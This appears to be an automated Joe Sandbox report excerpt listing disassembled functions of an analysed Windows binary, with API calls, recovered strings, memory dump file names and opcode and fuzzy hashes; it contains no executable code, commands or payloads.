                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                    • String ID: Ping
                                                                                                    • API String ID: 1028309954-2246546115
                                                                                                    • Opcode ID: cf645f1d84fdc995920693403b8adf6953a5e68edb633704e238c728667231bc
                                                                                                    • Instruction ID: 8cf38cda3ecf98b7988d841ad342430bc6d59a26b650dad342f0b9c04ff0848c
                                                                                                    • Opcode Fuzzy Hash: cf645f1d84fdc995920693403b8adf6953a5e68edb633704e238c728667231bc
                                                                                                    • Instruction Fuzzy Hash: DE918D356182119FD320EF15D988F1ABBE0EF49318F1485A9F4699B6A3CB30ED45CF91
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$BuffCharLower
                                                                                                    • String ID: cdecl$none$stdcall$winapi
                                                                                                    • API String ID: 707087890-567219261
                                                                                                    • Opcode ID: 9bb7cb0cbfb5988f71200afe2936ae657db64eb6d3b69a110082212a405b61f0
                                                                                                    • Instruction ID: 147591e9ae92f377a954fdf8f6541026d46c1be025b75ad190b51fe1e3a849d7
                                                                                                    • Opcode Fuzzy Hash: 9bb7cb0cbfb5988f71200afe2936ae657db64eb6d3b69a110082212a405b61f0
                                                                                                    • Instruction Fuzzy Hash: 4151C332A011269BCB14EF6CD9909BEB7E5FF65364B2142A9E42AE72C4DF34DD40C790
                                                                                                    APIs
                                                                                                    • CoInitialize.OLE32 ref: 00B23774
                                                                                                    • CoUninitialize.OLE32 ref: 00B2377F
                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000017,00B3FB78,?), ref: 00B237D9
                                                                                                    • IIDFromString.OLE32(?,?), ref: 00B2384C
                                                                                                    • VariantInit.OLEAUT32(?), ref: 00B238E4
                                                                                                    • VariantClear.OLEAUT32(?), ref: 00B23936
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                    • API String ID: 636576611-1287834457
                                                                                                    • Opcode ID: 9592e98d22bd0cf00cf138878baf72870289af253a87cddb5fd41b8adae87de6
                                                                                                    • Instruction ID: 7cfc4cd6bf232c993c8a79c62dffd5db934eb5fb6ebcaf3537418567bb71e3bf
                                                                                                    • Opcode Fuzzy Hash: 9592e98d22bd0cf00cf138878baf72870289af253a87cddb5fd41b8adae87de6
                                                                                                    • Instruction Fuzzy Hash: EA61C370608311AFD710DF54D888F6EBBE8EF49B14F104889F5899B2A1D774EE48CB92
                                                                                                    APIs
                                                                                                    • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00B133CF
                                                                                                      • Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD
                                                                                                    • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00B133F0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LoadString$_wcslen
                                                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                                    • API String ID: 4099089115-3080491070
                                                                                                    • Opcode ID: 00da6a650813bd9ef8bb0926d79731dc3e52b5180a1b15af57aaf963d017369a
                                                                                                    • Instruction ID: 05253d418f275b21e94f836b8d27065ee057647b405310bc680147d48da5728e
                                                                                                    • Opcode Fuzzy Hash: 00da6a650813bd9ef8bb0926d79731dc3e52b5180a1b15af57aaf963d017369a
                                                                                                    • Instruction Fuzzy Hash: E6517D32900209AADF15EBA0CE42EEEB7B9EF15740F1440A5F405731A2EF252F98DB61
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$BuffCharUpper
                                                                                                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                    • API String ID: 1256254125-769500911
                                                                                                    • Opcode ID: 848cf60a9244d687d6ac55120a113323ec4dd3578331237e67791018393c51ef
                                                                                                    • Instruction ID: 7808186bf861b1d33259ba05e571ae80a088ffc3b4f3219d6822ebf950d668c3
                                                                                                    • Opcode Fuzzy Hash: 848cf60a9244d687d6ac55120a113323ec4dd3578331237e67791018393c51ef
                                                                                                    • Instruction Fuzzy Hash: 0641A532A001279ACB205F7DC990DBEBFE5EB65B54B2542A9E421D72C4E736CD81C790
                                                                                                    APIs
                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 00B153A0
                                                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00B15416
                                                                                                    • GetLastError.KERNEL32 ref: 00B15420
                                                                                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 00B154A7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                    • API String ID: 4194297153-14809454
                                                                                                    • Opcode ID: 80cef1c4f5e22d4cc427060d6489264125ee65d56c39d30b3f114f59d07f7727
                                                                                                    • Instruction ID: 6392d5eee1b15aad717b57d33fe3eb11566819b8ebe4d8af1fe80ba6656bc61c
                                                                                                    • Opcode Fuzzy Hash: 80cef1c4f5e22d4cc427060d6489264125ee65d56c39d30b3f114f59d07f7727
                                                                                                    • Instruction Fuzzy Hash: 74316B35A00608DFD720DF68C984AEABBF4EB89305F5480A9E4059B396DB75DDC6CB90
                                                                                                    APIs
                                                                                                    • CreateMenu.USER32 ref: 00B33C79
                                                                                                    • SetMenu.USER32(?,00000000), ref: 00B33C88
                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B33D10
                                                                                                    • IsMenu.USER32(?), ref: 00B33D24
                                                                                                    • CreatePopupMenu.USER32 ref: 00B33D2E
                                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00B33D5B
                                                                                                    • DrawMenuBar.USER32 ref: 00B33D63
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                    • String ID: 0$F
                                                                                                    • API String ID: 161812096-3044882817
                                                                                                    • Opcode ID: b0e77bdbf1b7e7bad5afe80fb031d12a0c1b2f0570d7dc902ee8a8f10b9afbf1
                                                                                                    • Instruction ID: 6fe8ad00208ae50ffb35635246b2cb8ffbd97fc364c551bdc76717f5f055fc24
                                                                                                    • Opcode Fuzzy Hash: b0e77bdbf1b7e7bad5afe80fb031d12a0c1b2f0570d7dc902ee8a8f10b9afbf1
                                                                                                    • Instruction Fuzzy Hash: 9B415979A01209EFDB14CFA4D884AAA7BF5FF49750F240069F956A7360DB30AA10CF94
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00B33A9D
                                                                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00B33AA0
                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00B33AC7
                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B33AEA
                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00B33B62
                                                                                                    • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00B33BAC
                                                                                                    • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00B33BC7
                                                                                                    • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00B33BE2
                                                                                                    • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00B33BF6
                                                                                                    • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00B33C13
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$LongWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 312131281-0
                                                                                                    • Opcode ID: 1655ac528b4c1f463bb8d73bc40c5c0a2560b1b4337a20d82b35d892d7d9daf7
                                                                                                    • Instruction ID: 43550e28db9462a36894656565aa91c1de961f7cbab2e63db251fc4337638358
                                                                                                    • Opcode Fuzzy Hash: 1655ac528b4c1f463bb8d73bc40c5c0a2560b1b4337a20d82b35d892d7d9daf7
                                                                                                    • Instruction Fuzzy Hash: 9A616C75900248AFDB10DFA8CC81EEE77F8EB09700F204199FA15A72A1D774AE46DB60
                                                                                                    APIs
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00B0B151
                                                                                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00B0A1E1,?,00000001), ref: 00B0B165
                                                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 00B0B16C
                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B0A1E1,?,00000001), ref: 00B0B17B
                                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00B0B18D
                                                                                                    • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00B0A1E1,?,00000001), ref: 00B0B1A6
                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B0A1E1,?,00000001), ref: 00B0B1B8
                                                                                                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00B0A1E1,?,00000001), ref: 00B0B1FD
                                                                                                    • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00B0A1E1,?,00000001), ref: 00B0B212
                                                                                                    • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00B0A1E1,?,00000001), ref: 00B0B21D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                    • String ID:
                                                                                                    • API String ID: 2156557900-0
                                                                                                    • Opcode ID: bfd8bddcbf874af3358dc645bee2f06710f075fc4120585ad94ca8696072b662
                                                                                                    • Instruction ID: f828a6efe0b6224f8d315fdc93c481f9b003578d192e98e80f5bc796a1c6e80f
                                                                                                    • Opcode Fuzzy Hash: bfd8bddcbf874af3358dc645bee2f06710f075fc4120585ad94ca8696072b662
                                                                                                    • Instruction Fuzzy Hash: 6331BB75500204BFDB109F64DC99F6D7FE9FB61711F204444FA09E72A0DBB49A808F60
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 00AD2C94
                                                                                                      • Part of subcall function 00AD29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00ADD7D1,00000000,00000000,00000000,00000000,?,00ADD7F8,00000000,00000007,00000000,?,00ADDBF5,00000000), ref: 00AD29DE
                                                                                                      • Part of subcall function 00AD29C8: GetLastError.KERNEL32(00000000,?,00ADD7D1,00000000,00000000,00000000,00000000,?,00ADD7F8,00000000,00000007,00000000,?,00ADDBF5,00000000,00000000), ref: 00AD29F0
                                                                                                    • _free.LIBCMT ref: 00AD2CA0
                                                                                                    • _free.LIBCMT ref: 00AD2CAB
                                                                                                    • _free.LIBCMT ref: 00AD2CB6
                                                                                                    • _free.LIBCMT ref: 00AD2CC1
                                                                                                    • _free.LIBCMT ref: 00AD2CCC
                                                                                                    • _free.LIBCMT ref: 00AD2CD7
                                                                                                    • _free.LIBCMT ref: 00AD2CE2
                                                                                                    • _free.LIBCMT ref: 00AD2CED
                                                                                                    • _free.LIBCMT ref: 00AD2CFB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 776569668-0
                                                                                                    • Opcode ID: fc1f23af8225f1cb4c6a8582a12060def63c37c818515792999fd4dd6b364103
                                                                                                    • Instruction ID: 93f821a3d387b2fed8cd12f8de1afcb0d2c68ec430a16f332394738d3f068037
                                                                                                    • Opcode Fuzzy Hash: fc1f23af8225f1cb4c6a8582a12060def63c37c818515792999fd4dd6b364103
                                                                                                    • Instruction Fuzzy Hash: B311A476500108AFCB02EF54DA92EDD3BA5FF55350F4144A6FA4A9F322DA31EE50EB90
                                                                                                    APIs
                                                                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00AA1459
                                                                                                    • OleUninitialize.OLE32(?,00000000), ref: 00AA14F8
                                                                                                    • UnregisterHotKey.USER32(?), ref: 00AA16DD
                                                                                                    • DestroyWindow.USER32(?), ref: 00AE24B9
                                                                                                    • FreeLibrary.KERNEL32(?), ref: 00AE251E
                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00AE254B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                    • String ID: close all
                                                                                                    • API String ID: 469580280-3243417748
                                                                                                    • Opcode ID: 6016369ef6ed842d20706ac75e010f9170242f28d60ad73d14dd10e400992c02
                                                                                                    • Instruction ID: 5eaeedd0336d3ca2c26e45156f75d4377fb5a087b4768604f0b43b38e8bb9ac2
                                                                                                    • Opcode Fuzzy Hash: 6016369ef6ed842d20706ac75e010f9170242f28d60ad73d14dd10e400992c02
                                                                                                    • Instruction Fuzzy Hash: 65D1A031701212DFDB19EF55CA95B69F7A8BF06700F2542ADE44AAB292DB30ED12CF50
                                                                                                    APIs
                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B17FAD
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00B17FC1
                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00B17FEB
                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00B18005
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00B18017
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00B18060
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00B180B0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentDirectory$AttributesFile
                                                                                                    • String ID: *.*
                                                                                                    • API String ID: 769691225-438819550
                                                                                                    • Opcode ID: 7e52421ff8b9914ce4fab4880e57e7cbc19a4358445ccb82a0a8317a9d49579b
                                                                                                    • Instruction ID: 8e4486b25b937188d30b5711701bae2e1aa679db66f5d046c74c4731e09fd2f9
                                                                                                    • Opcode Fuzzy Hash: 7e52421ff8b9914ce4fab4880e57e7cbc19a4358445ccb82a0a8317a9d49579b
                                                                                                    • Instruction Fuzzy Hash: FC8191725482459BCB20EF54C8849EEB7E8FF89310F9448AEF885D7250DF35DD858B92
                                                                                                    APIs
                                                                                                    • SetWindowLongW.USER32(?,000000EB), ref: 00AA5C7A
                                                                                                      • Part of subcall function 00AA5D0A: GetClientRect.USER32(?,?), ref: 00AA5D30
                                                                                                      • Part of subcall function 00AA5D0A: GetWindowRect.USER32(?,?), ref: 00AA5D71
                                                                                                      • Part of subcall function 00AA5D0A: ScreenToClient.USER32(?,?), ref: 00AA5D99
                                                                                                    • GetDC.USER32 ref: 00AE46F5
                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00AE4708
                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00AE4716
                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00AE472B
                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00AE4733
                                                                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00AE47C4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                    • String ID: U
                                                                                                    • API String ID: 4009187628-3372436214
                                                                                                    • Opcode ID: c8b25a79d1fbb73b852a0011ce745f2a953a636b4e6ef678208368ee458808d5
                                                                                                    • Instruction ID: 89d5d0fbada04375cd68a8fc7fe77692dd1687571eca60d8b70602d4d8073464
                                                                                                    • Opcode Fuzzy Hash: c8b25a79d1fbb73b852a0011ce745f2a953a636b4e6ef678208368ee458808d5
                                                                                                    • Instruction Fuzzy Hash: 1B71F330800245DFCF218F69C984ABA7BB9FF4E360F244269ED555B1AAC7318C81DFA0
                                                                                                    APIs
                                                                                                    • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 00B135E4
                                                                                                      • Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD
                                                                                                    • LoadStringW.USER32(00B72390,?,00000FFF,?), ref: 00B1360A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LoadString$_wcslen
                                                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                    • API String ID: 4099089115-2391861430
                                                                                                    • Opcode ID: c794937b338613d6376a57a1860ecec2631e836478737f0e2793fae5eb6baab0
                                                                                                    • Instruction ID: f26487777b1d8bdf11e09a851b55d9fd3c5a3f5355255d67c10a6794628414e5
                                                                                                    • Opcode Fuzzy Hash: c794937b338613d6376a57a1860ecec2631e836478737f0e2793fae5eb6baab0
                                                                                                    • Instruction Fuzzy Hash: BB515C72800219BADF15EBA0CD42EEEBBB8EF15740F5441A5F105731E2EB311A99DFA1
                                                                                                    APIs
                                                                                                      • Part of subcall function 00AB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00AB9BB2
                                                                                                      • Part of subcall function 00AB912D: GetCursorPos.USER32(?), ref: 00AB9141
                                                                                                      • Part of subcall function 00AB912D: ScreenToClient.USER32(00000000,?), ref: 00AB915E
                                                                                                      • Part of subcall function 00AB912D: GetAsyncKeyState.USER32(00000001), ref: 00AB9183
